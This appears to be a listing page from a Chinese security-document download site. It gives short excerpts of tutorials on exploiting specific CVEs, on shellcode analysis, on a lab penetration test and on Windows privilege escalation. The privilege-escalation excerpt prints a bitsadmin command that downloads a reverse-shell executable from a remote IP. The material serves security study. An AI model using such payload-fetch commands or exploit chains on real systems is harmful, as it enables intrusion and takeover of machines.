爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

某凌EKP未授权访问漏洞分析

# X凌EKP未授权访问漏洞分析教学文档 ## 0x00 产品简介 X凌EKP是一款企业协同办公平台，具有以下特点： - 适用于各种规模的组织 - 旨在提高工作效率、促进团队协作 - 优化业务流程 - 帮助组织更好地管理日常工作 - 增强企业竞争力 ## 0x01 漏洞概述 **漏洞类型**：未授权访问漏洞 **影响范围**：可以读取resource目录下的所有文件，包括日志请求信息 **影响版本**：V15等版本 ## 0x02 漏洞复现 ### 漏洞利用条件 1. 目

2025-08-24 08:50:49

Openfire身份认证漏洞分析（CVE-2023-32315）

# Openfire身份认证漏洞分析(CVE-2023-32315) 教学文档 ## 1. Openfire简介 Openfire是一个基于XMPP协议的即时通讯服务器/平台，用于搭建即时通讯服务。知名通讯软件如QQ、MSN和Gtalk(Gtalk基于XMPP协议)等都使用类似技术。在即时通讯中，由于需要保存状态和数据，通常不能采用点对点通讯，而是需要搭建服务器进行消息转发。 ## 2. 漏洞影响版本 - 3.10.0 <= Openfire < 4.6.8 - 4.7.0 <= O

2025-08-24 08:50:15

管道特权利用提升和比特梵德反病毒软件漏洞解析教程（CVE-2021-4198）

# 比特梵德反病毒软件漏洞解析与利用教程 (CVE-2021-4198 & CVE-2021-4199) ## 漏洞概述本教程详细解析了比特梵德(Bitdefender)反病毒软件中的两个严重漏洞： - **CVE-2021-4198**: 通过管道通信导致的本地特权提升漏洞 - **CVE-2021-4199**: 通过链接跟踪导致的拒绝服务(DoS)漏洞这两个漏洞允许攻击者从普通用户权限提升至SYSTEM权限，并可能导致反病毒软件核心功能瘫痪。 ## 漏洞发现方法论 ### 初

2025-08-24 08:39:31

Metabase RCE 内存马构造及GUI工具（CVE-2023-38646）

# Metabase RCE漏洞分析及内存马构造指南 (CVE-2023-38646) ## 漏洞概述 Metabase是一个开源的数据分析和可视化工具。2023年7月发现的CVE-2023-38646漏洞允许攻击者通过未授权访问获取setup-token，进而重置JDBC连接URL，导致H2数据库远程代码执行(RCE)。该漏洞源于Metabase中残留的setup-token未授权访问问题，结合H2数据库的特性可实现完整的攻击链。 ## 漏洞环境搭建 1. 下载受影响版本的Metaba

2025-08-24 08:38:43

Metasploit & CobaltStrike 的shellcode分析

# Metasploit & CobaltStrike Shellcode 深度分析 ## 1. 概述本文详细分析 Metasploit 和 CobaltStrike 框架生成的 shellcode 实现机制，重点解析 Reverse TCP、Reverse HTTP/HTTPS 和 Reverse DNS 三种常见 payload 的工作原理。 ## 2. Metasploit Shellcode 分析 ### 2.1 基本结构 Metasploit shellcode 通常采用以

2025-08-24 08:37:53

2023年Pwn2Own温哥华PWN比赛上的Ubuntu提权漏洞攻击

# Linux内核nftables子系统提权漏洞(CVE-2023-35001)分析与利用 ## 漏洞概述 CVE-2023-35001是Linux内核nftables子系统中的一个权限提升漏洞，该漏洞允许本地用户通过精心构造的nftables规则实现内核代码执行，从而获得root权限。该漏洞在2023年Pwn2Own Vancouver比赛中被利用来攻击Ubuntu系统。 ## 漏洞背景 ### nftables简介 nftables是Linux内核中用于包过滤的子系统，实现了一个基

2025-08-24 08:36:00

F5 BIG-IP RCE（CVE-2023-46747）漏洞分析复现

# F5 BIG-IP RCE漏洞(CVE-2023-46747)深度分析与复现指南 ## 1. 漏洞概述 F5 BIG-IP是美国F5公司开发的一款集成流量管理、DNS、出入站规则、Web应用防火墙、Web网关、负载均衡等功能的应用交付平台。 **漏洞描述**：此漏洞(CVE-2023-46747)可能允许未经验证的攻击者通过管理端口或自身IP地址访问BIG-IP系统，从而执行任意系统命令。 ## 2. 影响版本 | 分支 | 影响版本 | 修复版本

2025-08-24 08:35:07

Java安全之Weblogic漏洞分析与利用(上)

# WebLogic T3协议反序列化漏洞分析与利用指南 ## 1. WebLogic简介 Oracle WebLogic Server是一个统一的可扩展平台，专用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。它提供了强健、成熟和可扩展的Java Enterprise Edition (EE)和Jakarta EE实施方式，类似于Tomcat、Jboss等中间件。 **安装参考**： - Windows安装教程：[https://www.cnblogs.com/xrg-

2025-08-24 08:33:56

亿赛通漏洞浅析

# 亿赛通漏洞分析与利用教学文档 ## 1. 文件上传漏洞分析 ### 1.1 漏洞发现在亿赛通安装包的web.xml文件中搜索upload相关的servlet，发现`UploadFileFromClientServiceForClient`存在文件上传漏洞。 ### 1.2 漏洞代码分析 1. 存在文件写入操作，关键点在于文件名是否可控以及文件后缀限制 2. `fileName`获取流程： - 遍历`var12`数组，查找以`fileName`开头的元素 - 取`=`号后面

2025-08-24 08:32:11

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

# MATRIX-BREAKOUT: 2 MORPHEUS 靶机渗透教学文档 ## 1. 靶机概述 - 靶机名称: MATRIX-BREAKOUT: 2 MORPHEUS - 难度等级: Medium-Hard - 下载地址: https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ - 攻击环境: Kali Linux 2020.4 - 网络模式: NAT ## 2. 信息收集阶段 ### 2.1 确定靶机IP 使用A

2025-08-24 08:31:17

Window提权相关操作和技巧

# Windows提权操作与技巧全面指南 ## 文件下载方法 ### bitsadmin - Windows命令行下载工具，Win7及之后系统自带 - 特性： - 网络不稳定时可自动重试 - 支持URL跳转 - 不能下载HTML页面 ```cmd bitsadmin /transfer test http://10.6.54.194:8000/reverse.exe c:\users\staccato\desktop\reverse.exe start bitsadmin /t

2025-08-24 08:30:41

记一次四层内网攻防渗透测试大实验

# 四层内网攻防渗透测试实战教学文档 ## 一、实验环境概述本次渗透测试实验涉及四层内网环境，从外网Web服务器逐步深入，最终获取域控权限。主要网络拓扑如下： - 外网层：Kali攻击机 (192.168.1.128) - 第一层：Web服务器 (192.168.1.129) - 第二层：内网服务器 (192.168.52.10/20) - 第三层：内网服务器 (192.168.71.10/20) - 第四层：域环境 (192.168.93.30/40) ## 二、渗透测试详细步骤

2025-08-24 08:29:23

跳转到页